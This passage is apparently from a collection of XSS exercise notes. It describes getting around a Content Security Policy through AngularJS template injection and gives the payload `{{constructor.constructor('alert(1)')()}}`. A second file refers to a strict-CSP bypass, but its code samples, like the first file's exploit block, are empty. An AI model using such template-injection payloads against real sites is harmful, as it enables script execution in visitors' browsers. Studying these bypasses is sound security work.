`
16 |
17 | But this violates csp style...
18 |
19 | but heeey with angular we can put code in `{{ }}`.
20 | Then I discovered that `{{constructor.constructor("alert(1)")()}}` is a valid payload!
21 |
22 | Exploit:
23 |
24 | ```html
25 |
26 |
27 | ```
28 |
--------------------------------------------------------------------------------
/xss/strict-csp/exploit.md:
--------------------------------------------------------------------------------
1 | # strict csp
2 |
3 | From Black hat 2017, require is vulnerable to this:
4 |
5 | ``
6 |
7 | SO:
8 |
9 | ``
10 |
--------------------------------------------------------------------------------